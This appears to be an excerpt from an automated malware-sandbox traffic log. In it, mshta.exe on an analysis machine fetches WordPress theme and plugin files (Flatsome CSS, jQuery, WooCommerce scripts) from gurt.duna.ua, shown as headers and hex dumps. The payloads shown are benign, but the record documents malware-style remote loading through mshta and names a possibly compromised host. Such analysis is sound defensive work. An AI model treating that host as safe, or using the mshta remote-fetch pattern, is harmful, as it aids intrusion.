                                                                                                                                                                                          2024-10-27 06:35:18 UTC1143INData Raw: 2e 61 77 64 72 5f 66 72 65 65 5f 70 72 6f 64 75 63 74 5f 74 65 78 74 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 20 31 30 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 64 39 63 64 32 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0a 7d 0a 2e 76 61 72 69 61 74 69 6f 6e 2d 77 64 72 5f 66 72 65 65 5f 70 72 6f 64 75 63 74 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 2e 61 77 64 72 5f 63 68 61 6e 67 65 5f 70 72 6f 64 75 63 74 7b 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 7d 0a
                                                                                                                                                                                          Data Ascii: .awdr_free_product_text{ display: inline-block; padding: 0px 10px; background-color: #3d9cd2; color: #fff; border-radius: 3px;}.variation-wdr_free_product{ display: none !important;}.awdr_change_product{ cursor: pointer;}


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          22192.168.2.449754185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:19 UTC458OUTGET /wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:20 UTC333INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:19 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 24163
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:50:41 GMT
                                                                                                                                                                                          ETag: "64e09071-5e63"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:19 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:20 UTC16051INData Raw: 40 63 68 61 72 73 65 74 20 22 75 74 66 2d 38 22 3b 2e 77 69 64 67 65 74 5f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 5f 63 6f 6e 74 65 6e 74 20 2e 62 6c 6f 63 6b 55 49 2e 62 6c 6f 63 6b 4f 76 65 72 6c 61 79 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63 6b 6f 75 74 2d 72 65 76 69 65 77 2d 6f 72 64 65 72 20 2e 62 6c 6f 63 6b 55 49 2e 62 6c 6f 63 6b 4f 76 65 72 6c 61 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 6f 70 61 63 69 74 79 3a 2e 36 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 77 69 64 67 65 74 5f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 5f 63 6f 6e 74 65 6e 74 20 2e 62 6c 6f 63 6b 55 49 2e 62 6c 6f 63 6b 4f 76 65 72 6c 61 79 3a 62 65 66 6f 72 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63
                                                                                                                                                                                          Data Ascii: @charset "utf-8";.widget_shopping_cart_content .blockUI.blockOverlay,.woocommerce-checkout-review-order .blockUI.blockOverlay{background-color:#fff!important;opacity:.6!important}.widget_shopping_cart_content .blockUI.blockOverlay:before,.woocommerce-chec
                                                                                                                                                                                          2024-10-27 06:35:20 UTC8112INData Raw: 6f 74 74 6f 6d 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 65 6d 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 3a 33 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 72 69 67 68 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 32 30 7d 2e 73 74 69 63 6b 79 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2d 2d 61 63 74 69 76 65 20 2e 76 61 72 69 61 74 69 6f 6e 73 2c 2e 73 74 69 63 6b 79 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2d 2d 61 63 74 69 76 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 76 61 72 69 61 74 69 6f 6e 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 73 74 69 63 6b 79 2d 61 64 64 2d
                                                                                                                                                                                          Data Ascii: ottom:0;display:flex;flex-wrap:wrap;font-size:.9em;justify-content:center;left:0;padding:3px;position:fixed;right:0;z-index:20}.sticky-add-to-cart--active .variations,.sticky-add-to-cart--active .woocommerce-variation-description{display:none}.sticky-add-


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          23192.168.2.449756185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:19 UTC481OUTGET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/husky.js?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:20 UTC347INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:20 GMT
                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                          Content-Length: 16030
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-3e9e"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:20 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:20 UTC16030INData Raw: 27 75 73 65 20 73 74 72 69 63 74 27 3b 0a 0a 63 6c 61 73 73 20 48 75 73 6b 79 54 65 78 74 20 7b 0a 20 20 20 20 63 6f 6e 73 74 72 75 63 74 6f 72 28 69 6e 70 75 74 2c 20 64 61 74 61 20 3d 20 7b 7d 29 20 7b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 73 65 61 72 63 68 65 64 5f 76 61 6c 75 65 20 3d 20 27 27 3b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 63 75 72 72 65 6e 74 5f 70 61 67 65 20 3d 20 30 3b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 64 61 74 61 20 3d 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 20 64 61 74 61 29 3b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 69 6e 70 75 74 20 3d 20 69 6e 70 75 74 3b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 69 6e 69 74 5f 69 6e 70 75 74 28 29 3b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65
                                                                                                                                                                                          Data Ascii: 'use strict';class HuskyText { constructor(input, data = {}) { this.searched_value = ''; this.current_page = 0; this.data = Object.assign({}, data); this.input = input; this.init_input(); this.containe


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          24192.168.2.449758185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:21 UTC437OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:21 UTC348INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:21 GMT
                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                          Content-Length: 89684
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:52:45 GMT
                                                                                                                                                                                          ETag: "64e090ed-15e54"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:21 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:21 UTC16036INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                          Data Ascii: /*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                          2024-10-27 06:35:21 UTC16384INData Raw: 69 6c 65 28 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 21 31 3b 75 3d 6c 3d 22 6f 6e 6c 79 22 3d 3d 3d 68 26 26 21 75 26 26 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 7d 72 65 74 75 72 6e 21 30 7d 69 66 28 75 3d 5b 6d 3f 63 2e 66 69 72 73 74 43 68 69 6c 64 3a 63 2e 6c 61 73 74 43 68 69 6c 64 5d 2c 6d 26 26 70 29 7b 64 3d 28 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 63 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 26 26 72 5b 32 5d 2c 61 3d 73 26 26 63 2e
                                                                                                                                                                                          Data Ascii: ile(a=a[l])if(x?a.nodeName.toLowerCase()===f:1===a.nodeType)return!1;u=l="only"===h&&!u&&"nextSibling"}return!0}if(u=[m?c.firstChild:c.lastChild],m&&p){d=(s=(r=(i=(o=(a=c)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1])&&r[2],a=s&&c.
                                                                                                                                                                                          2024-10-27 06:35:21 UTC16384INData Raw: 3d 3d 3d 77 28 6e 29 29 66 6f 72 28 73 20 69 6e 20 69 3d 21 30 2c 6e 29 42 28 65 2c 74 2c 73 2c 6e 5b 73 5d 2c 21 30 2c 6f 2c 61 29 3b 65 6c 73 65 20 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 26 26 28 69 3d 21 30 2c 6d 28 72 29 7c 7c 28 61 3d 21 30 29 2c 6c 26 26 28 61 3f 28 74 2e 63 61 6c 6c 28 65 2c 72 29 2c 74 3d 6e 75 6c 6c 29 3a 28 6c 3d 74 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 2e 63 61 6c 6c 28 53 28 65 29 2c 6e 29 7d 29 29 2c 74 29 29 66 6f 72 28 3b 73 3c 75 3b 73 2b 2b 29 74 28 65 5b 73 5d 2c 6e 2c 61 3f 72 3a 72 2e 63 61 6c 6c 28 65 5b 73 5d 2c 73 2c 74 28 65 5b 73 5d 2c 6e 29 29 29 3b 72 65 74 75 72 6e 20 69 3f 65 3a 6c 3f 74 2e 63 61 6c 6c 28 65 29 3a 75 3f 74 28 65 5b 30 5d 2c 6e 29 3a 6f 7d 2c 5f 3d 2f
                                                                                                                                                                                          Data Ascii: ===w(n))for(s in i=!0,n)B(e,t,s,n[s],!0,o,a);else if(void 0!==r&&(i=!0,m(r)||(a=!0),l&&(a?(t.call(e,r),t=null):(l=t,t=function(e,t,n){return l.call(S(e),n)})),t))for(;s<u;s++)t(e[s],n,a?r:r.call(e[s],s,t(e[s],n)));return i?e:l?t.call(e):u?t(e[0],n):o},_=/
                                                                                                                                                                                          2024-10-27 06:35:21 UTC16384INData Raw: 29 2c 66 3d 69 65 28 65 29 3b 69 66 28 21 28 76 2e 6e 6f 43 6c 6f 6e 65 43 68 65 63 6b 65 64 7c 7c 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 26 26 31 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 29 29 66 6f 72 28 61 3d 79 65 28 63 29 2c 72 3d 30 2c 69 3d 28 6f 3d 79 65 28 65 29 29 2e 6c 65 6e 67 74 68 3b 72 3c 69 3b 72 2b 2b 29 73 3d 6f 5b 72 5d 2c 75 3d 61 5b 72 5d 2c 76 6f 69 64 20 30 2c 22 69 6e 70 75 74 22 3d 3d 3d 28 6c 3d 75 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 26 26 70 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 3f 75 2e 63 68 65 63 6b 65 64 3d 73 2e 63 68 65 63 6b 65 64 3a 22 69 6e 70 75 74 22 21 3d 3d 6c 26 26 22 74 65 78 74 61 72 65 61 22 21 3d 3d 6c 7c 7c 28 75 2e 64 65
                                                                                                                                                                                          Data Ascii: ),f=ie(e);if(!(v.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||S.isXMLDoc(e)))for(a=ye(c),r=0,i=(o=ye(e)).length;r<i;r++)s=o[r],u=a[r],void 0,"input"===(l=u.nodeName.toLowerCase())&&pe.test(s.type)?u.checked=s.checked:"input"!==l&&"textarea"!==l||(u.de
                                                                                                                                                                                          2024-10-27 06:35:22 UTC16384INData Raw: 74 28 65 2c 72 29 3b 74 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 43 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6e 29 7d 7d 29 7d 2c 72 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 2c 69 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 65 6c 65 63 74 22 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6f 70 74 69 6f 6e 22 29 29 2c 72 74 2e 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 2c 76 2e 63 68 65 63 6b 4f 6e 3d 22 22 21 3d 3d 72 74 2e 76 61 6c 75 65 2c 76 2e 6f 70 74 53 65 6c 65 63 74 65 64 3d 69 74 2e 73 65 6c 65 63 74 65 64 2c 28 72 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 76 61 6c 75 65 3d 22 74 22 2c 72 74 2e
                                                                                                                                                                                          Data Ascii: t(e,r);t.stop=function(){C.clearTimeout(n)}})},rt=E.createElement("input"),it=E.createElement("select").appendChild(E.createElement("option")),rt.type="checkbox",v.checkOn=""!==rt.value,v.optSelected=it.selected,(rt=E.createElement("input")).value="t",rt.
                                                                                                                                                                                          2024-10-27 06:35:22 UTC8112INData Raw: 22 62 6f 64 79 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 53 28 74 68 69 73 29 2e 72 65 70 6c 61 63 65 57 69 74 68 28 74 68 69 73 2e 63 68 69 6c 64 4e 6f 64 65 73 29 7d 29 2c 74 68 69 73 7d 7d 29 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 68 69 64 64 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 76 69 73 69 62 6c 65 28 65 29 7d 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 76 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 28 65 2e 6f 66 66 73 65 74 57 69 64 74 68 7c 7c 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7c 7c 65 2e 67 65 74 43 6c 69 65 6e 74 52 65 63 74 73 28 29 2e 6c 65 6e 67 74 68 29 7d 2c 53 2e 61 6a 61 78 53 65 74 74 69 6e 67
                                                                                                                                                                                          Data Ascii: "body").each(function(){S(this).replaceWith(this.childNodes)}),this}}),S.expr.pseudos.hidden=function(e){return!S.expr.pseudos.visible(e)},S.expr.pseudos.visible=function(e){return!!(e.offsetWidth||e.offsetHeight||e.getClientRects().length)},S.ajaxSetting


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          25192.168.2.449759185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:21 UTC465OUTGET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:21 UTC346INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:21 GMT
                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                          Content-Length: 9679
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Fri, 10 Sep 2021 13:16:34 GMT
                                                                                                                                                                                          ETag: "613b5ab2-25cf"
                                                                                                                                                                                          x-ray: wnp447:0.001/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:21 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:21 UTC9679INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 2a 20 72 65 66 72 65 73 68 20 63 61 72 74 20 77 68 65 6e 20 70 61 79 6d 65 6e 74 20 6d 65 74 68 6f 64 20 63 68 61 6e 67 65 64 0a 20 20 20 20 20 2a 2f 0a 20 20 20 20 69 66 20 28 61 77 64 72 5f 70 61 72 61 6d 73 2e 72 65 66 72 65 73 68 5f 6f 72 64 65 72 5f 72 65 76 69 65 77 20 3d 3d 20 27 31 27 29 20 7b 0a 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 27 63 68 61 6e 67 65 27 2c 20 27 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 70 61 79 6d 65 6e 74 5f 6d 65 74 68 6f 64 22 5d 2c 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 62 69 6c 6c 69 6e 67 5f 63 69 74 79 22 5d 2c 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 62 69 6c 6c 69 6e 67 5f 70 6f 73 74 63 6f 64 65 22 5d 27 2c 20 66
                                                                                                                                                                                          Data Ascii: (function ($) { /** * refresh cart when payment method changed */ if (awdr_params.refresh_order_review == '1') { $(document).on('change', 'input[name="payment_method"],input[name="billing_city"],input[name="billing_postcode"]', f


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          26192.168.2.461715185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:22 UTC474OUTGET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.3.8 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:22 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:22 GMT
                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                          Content-Length: 3053
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Fri, 10 Sep 2021 13:16:34 GMT
                                                                                                                                                                                          ETag: "613b5ab2-bed"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:22 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:22 UTC3053INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 24 2e 65 78 74 65 6e 64 28 7b 0a 20 20 20 20 20 20 20 20 41 64 76 61 6e 63 65 57 6f 6f 44 69 73 63 6f 75 6e 74 52 75 6c 65 73 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 6d 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 6f 64 75 63 74 5f 69 64 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 71 75 61 6e 74 69 74 79 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 70 74 69 6f 6e 73 3a 20 5b 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 65 74 44 79 6e 61 6d 69 63 44 69 73 63 6f 75 6e 74 50 72 69 63 65 46 72 6f 6d 43 61 72 74 46 6f 72 6d 3a 20 66 75 6e 63 74 69 6f 6e 28 24
                                                                                                                                                                                          Data Ascii: (function ($) { $.extend({ AdvanceWooDiscountRules: { form: null, product_id: null, quantity: 0, options: [], target: null, getDynamicDiscountPriceFromCartForm: function($


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          27192.168.2.461717185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:23 UTC489OUTGET /wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tracker.js?ver=1.13.1 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:23 UTC344INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:23 GMT
                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                          Content-Length: 891
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Wed, 03 Nov 2021 13:55:03 GMT
                                                                                                                                                                                          ETag: "618294b7-37b"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:23 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
